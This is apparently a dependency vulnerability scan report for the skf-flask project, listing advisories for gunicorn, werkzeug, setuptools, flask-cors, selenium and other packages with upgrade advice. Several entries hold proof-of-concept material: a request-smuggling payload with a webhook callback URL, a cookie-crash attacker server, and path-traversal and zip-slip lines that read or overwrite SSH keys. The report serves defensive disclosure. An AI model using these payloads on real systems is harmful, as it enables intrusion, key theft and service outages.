Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: pymysql
- Introduced through: pymysql@1.0.2
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › pymysql@1.0.2Remediation: Upgrade to pymysql@1.1.1.
Overview
PyMySQL is a Pure Python MySQL Driver
Affected versions of this package are vulnerable to SQL Injection through the escape_dict
function. An attacker can execute arbitrary SQL commands by using untrusted JSON input because keys are not properly escaped.
Remediation
Upgrade PyMySQL
to version 1.1.1 or higher.
References
high severity
- Vulnerable module: flask-cors
- Introduced through: flask-cors@3.0.10
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10Remediation: Upgrade to flask-cors@6.0.0.
Overview
Flask-Cors is an A Flask extension adding a decorator for CORS support
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity in the try_match()
function. An attacker can access restricted paths and potentially expose sensitive data by exploiting the case insensitivity in path matching.
Remediation
Upgrade Flask-Cors
to version 6.0.0 or higher.
References
high severity
- Vulnerable module: gunicorn
- Introduced through: gunicorn@20.0.4
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › gunicorn@20.0.4Remediation: Upgrade to gunicorn@23.0.0.
Overview
gunicorn is a Python WSGI HTTP Server for UNIX
Affected versions of this package are vulnerable to HTTP Request Smuggling due to improper validation of the Transfer-Encoding
header. An attacker can manipulate session data, poison caches, or compromise data integrity by exploiting the fallback to Content-Length
when Transfer-Encoding
is not correctly handled.
PoC
POST / HTTP/1.1
Host: 172.24.10.169
Content-Length: 6
Transfer-Encoding: chunked,gzip
73
GET /admin?callback1=https://webhook.site/717269ae-8b97-4866-9a24-17ccef265a30 HTTP/1.1
Host: 172.24.10.169
0
Remediation
Upgrade gunicorn
to version 23.0.0 or higher.
References
high severity
- Vulnerable module: protobuf
- Introduced through: google-api-python-client@2.0.2
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › protobuf@3.20.3Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › googleapis-common-protos@1.70.0 › protobuf@3.20.3Remediation: Upgrade to google-api-python-client@2.109.0.
Overview
protobuf is a Google’s data interchange format
Affected versions of this package are vulnerable to Uncontrolled Recursion when parsing untrusted Protocol Buffers data containing an excessive number of recursive groups, recursive messages, or a series of SGROUP tags. An attacker can provide crafted input that will corrupt the backend by exceeding the Python recursion limit and result in denial of service by crashing the application with a RecursionError
.
Note: This problem impacts only the pure-Python implementation of the protobuf-python backend and does not influence the CPython PyPi wheels, which, by default, do not utilize pure Python.
Remediation
Upgrade protobuf
to version 4.25.8, 5.29.5, 6.31.1 or higher.
References
high severity
- Vulnerable module: flask
- Introduced through: flask@1.1.2, flask-bcrypt@0.7.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2Remediation: Upgrade to flask@2.2.5.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Information Exposure in the form of exposing the permanent session cookie, when all of the following conditions are met:
The application is hosted behind a caching proxy that does not strip cookies or ignore responses with cookies.
The application sets
session.permanent = True
.The application does not access or modify the session at any point during a request.
SESSION_REFRESH_EACH_REQUEST
is enabled (the default).The application does not set a
Cache-Control
header to indicate that a page is private or should not be cached.
A response containing data intended for one client may be cached and sent to other clients. If the proxy also caches Set-Cookie
headers, it may send one client's session
cookie to other clients. Under these conditions, the Vary: Cookie
header is not set when a session is refreshed (re-sent to update the expiration) without being accessed or modified.
Remediation
Upgrade flask
to version 2.2.5, 2.3.2 or higher.
References
high severity
- Vulnerable module: gunicorn
- Introduced through: gunicorn@20.0.4
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › gunicorn@20.0.4Remediation: Upgrade to gunicorn@22.0.0.
Overview
gunicorn is a Python WSGI HTTP Server for UNIX
Affected versions of this package are vulnerable to HTTP Request Smuggling due to the improper validation of Transfer-Encoding
headers. An attacker can bypass security restrictions and access restricted endpoints by crafting requests with conflicting Transfer-Encoding
headers.
Notes:
This is only exploitable if users have a network path which does not filter out invalid requests;
Users are advised to block access to restricted endpoints via a firewall or other mechanism until a fix can be developed.
This issue arises from the application's incorrectly processing of requests with multiple, conflicting
Transfer-Encoding
headers, treating them as chunked regardless of the final encoding specified.
Remediation
Upgrade gunicorn
to version 22.0.0 or higher.
References
high severity
- Vulnerable module: selenium
- Introduced through: selenium@3.141.0
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › selenium@3.141.0Remediation: Upgrade to selenium@4.15.1.
Overview
selenium is a Python language bindings for Selenium WebDriver
Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check on CookieWndProc
function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.
PoC
Attacker Server Code
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta
class CustomHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Send response status code
self.send_response(200)
# Send headers
self.send_header('Content-type', 'text/html')
# Set the cookie expiration to one day in the future
expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
self.send_header('Set-Cookie', well_formed_cookie)
malicious_cookie = f"cookie_name2" #crash
self.send_header('Set-Cookie', malicious_cookie)
self.end_headers()
# Send message back to client
message = "Hello world!"
self.wfile.write(bytes(message, "utf8"))
return
def run():
print('Starting server...')
server_address = ('127.0.0.1', 8090)
httpd = HTTPServer(server_address, CustomHTTPRequestHandler)
print('Server is running...')
httpd.serve_forever()
run()
Example Victim Code
from selenium import webdriver
import logging
import time
handler = logging.FileHandler("sel.log")
logger = logging.getLogger('selenium')
logging.basicConfig(level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
options = webdriver.IeOptions()
options.ignore_zoom_level = True
options.ignore_protected_mode_settings = True
options.attach_to_edge_chrome = True
options.initial_browser_url = 'https://selenium.dev'
service = webdriver.IeService(log_file="ie.log", log_level='DEBUG')
driver = webdriver.Ie(options=options,service=service)
driver.set_page_load_timeout(20)
print("Getting the page: ")
try:
driver.get("http://127.0.0.1:8090/")
except Exception as e:
print(e)
print("Got the page!")
print("Get Cookies: ")
cookies = driver.get_cookies()
print(cookies)
time.sleep(3)
driver.quit()
Remediation
Upgrade selenium
to version 4.15.1 or higher.
References
high severity
- Vulnerable module: setuptools
- Introduced through: google-auth@1.28.0, gunicorn@20.0.4 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-auth@2.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › gunicorn@20.0.4 › setuptools@40.5.0Remediation: Upgrade to gunicorn@20.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › setuptools@40.5.0Remediation: Upgrade to kubernetes@27.2.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-auth-httplib2@0.1.0 › google-auth@1.28.0 › setuptools@40.5.0
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to kubernetes@28.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-auth-httplib2@0.1.0 › google-auth@1.28.0 › setuptools@40.5.0
Overview
Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index
module's download functions due to the unsafe usage of os.system
. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.
Note
Because easy_install
and package_index
are deprecated, the exploitation surface is reduced, but it's conceivable through social engineering or minor compromise to a package index could grant remote access.
Remediation
Upgrade setuptools
to version 70.0.0 or higher.
References
high severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@0.16.1, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › werkzeug@0.16.1Remediation: Upgrade to werkzeug@2.2.3.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) when parsing multipart form data. An attacker can trigger the opening of multipart files containing a large number of file parts, which are processed using request.data
, request.form
, request.files
, or request.get_data(parse_form_data=False)
, consuming CPU, memory, or file handles resources. The amount of CPU time required can block worker processes from handling other requests. The amount of RAM required can trigger an out-of-memory and crash the process.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade werkzeug
to version 2.2.3 or higher.
References
high severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@0.16.1, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › werkzeug@0.16.1Remediation: Upgrade to werkzeug@3.0.3.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient hostname checks and the use of relative paths to resolve requests. When the debugger is enabled, an attacker can convince a user to enter their own PIN to interact with a domain and subdomain they control, and thereby cause malicious code to be executed.
The demonstrated attack vector requires a number of conditions that render this attack very difficult to achieve, especially if the victim application is running in the recommended configuration of not having the debugger enabled in production.
Remediation
Upgrade werkzeug
to version 3.0.3 or higher.
References
high severity
- Vulnerable module: pyjwt
- Introduced through: pyjwt@2.0.1
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › pyjwt@2.0.1Remediation: Upgrade to pyjwt@2.4.0.
Overview
PyJWT is a Python implementation of RFC 7519.
Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm via non-blacklisted public key formats, leading to key confusion.
Remediation
Upgrade PyJWT
to version 2.4.0 or higher.
References
medium severity
- Vulnerable module: flask-cors
- Introduced through: flask-cors@3.0.10
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10Remediation: Upgrade to flask-cors@6.0.0.
Overview
Flask-Cors is an A Flask extension adding a decorator for CORS support
Affected versions of this package are vulnerable to Improper Verification of Source of a Communication Channel due to improper application of regex path matching rules. An attacker can gain unauthorized cross-origin access to sensitive data or functionality by exploiting the prioritization of longer regex patterns over more specific ones, leading to less restrictive CORS policies being applied to sensitive endpoints.
Note:
An initial attempt to fix the vulnerability was included in 6.0.0 but it was proved to be incomplete. PR 392 fully addresses the issue.
Remediation
Upgrade Flask-Cors
to version 6.0.0 or higher.
References
medium severity
- Vulnerable module: flask-cors
- Introduced through: flask-cors@3.0.10
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10Remediation: Upgrade to flask-cors@6.0.0.
Overview
Flask-Cors is an A Flask extension adding a decorator for CORS support
Affected versions of this package are vulnerable to Origin Validation Error due to the replacement of +
characters with spaces in the unquote_plus()
function, when handling the request.path
parameter. An attacker can cause unauthorized cross-origin access or block valid requests by manipulating URL paths, leading to CORS policy bypasses.
Remediation
Upgrade Flask-Cors
to version 6.0.0 or higher.
References
medium severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@0.16.1, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › werkzeug@0.16.1Remediation: Upgrade to werkzeug@3.0.6.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in formparser.MultiPartParser()
. An attacker can cause the parser to consume more memory than the upload size, in excess of max_form_memory_size
, by sending malicious data in a non-file field of a multipart/form-data
request.
Remediation
Upgrade werkzeug
to version 3.0.6 or higher.
References
medium severity
- Vulnerable module: zipp
- Introduced through: pytest@6.2.2 and flask-restplus@0.13.0
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › pytest@6.2.2 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to pytest@7.4.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › pytest@6.2.2 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to pytest@7.4.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › jsonschema@4.17.3 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › pytest@6.2.2 › pluggy@0.13.1 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to pytest@7.4.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › jsonschema@4.17.3 › importlib-resources@5.12.0 › zipp@3.15.0Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › jsonschema@4.17.3 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to flask-restplus@0.13.0.
Overview
Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path
module, such as joinpath
, the overloaded division operator, and iterdir
.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade zipp
to version 3.19.1 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: google-auth@1.28.0, gunicorn@20.0.4 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-auth@2.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › gunicorn@20.0.4 › setuptools@40.5.0Remediation: Upgrade to gunicorn@20.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › setuptools@40.5.0Remediation: Upgrade to kubernetes@27.2.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-auth-httplib2@0.1.0 › google-auth@1.28.0 › setuptools@40.5.0
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to kubernetes@28.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-auth-httplib2@0.1.0 › google-auth@1.28.0 › setuptools@40.5.0
Overview
Affected versions of this package are vulnerable to Directory Traversal through the PackageIndex._download_url
method. Due to insufficient sanitization of special characters, an attacker can write files to arbitrary locations on the filesystem with the permissions of the process running the Python code. In certain scenarios, an attacker could potentially escalate to remote code execution by leveraging malicious URLs present in a package index.
PoC
python poc.py
# Payload file: http://localhost:8000/%2fhome%2fuser%2f.ssh%2fauthorized_keys
# Written to: /home/user/.ssh/authorized_keys
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st
is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public
route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e
is the URL encoded version of .
(dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip
.
One way to achieve this is by using a malicious zip
archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip
archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/
overwriting the authorized_keys
file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade setuptools
to version 78.1.1 or higher.
References
medium severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@0.16.1, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › werkzeug@0.16.1Remediation: Upgrade to werkzeug@2.3.8.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity in multipart data parsing. An attacker can cause a denial of service and block worker processes from handling legitimate requests by sending crafted multipart data to an endpoint that will parse it, eventually exhausting or killing all available workers.
Exploiting this vulnerability is possible if the uploaded file starts with CR
or LF
and is followed by megabytes of data without these characters.
Remediation
Upgrade werkzeug
to version 2.3.8, 3.0.1 or higher.
References
medium severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@0.16.1, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › werkzeug@0.16.1Remediation: Upgrade to werkzeug@3.0.6.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Werkzeug is a WSGI web application library.
Affected versions of this package are vulnerable to Directory Traversal due to a bypass for os.path.isabs()
, which allows the improper handling of UNC paths beginning with /
, in the safe_join()
function. This allows an attacker to read some files on the affected server, if they are stored in an affected path.
Note: This is only exploitable on Windows systems using Python versions prior to 3.11.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
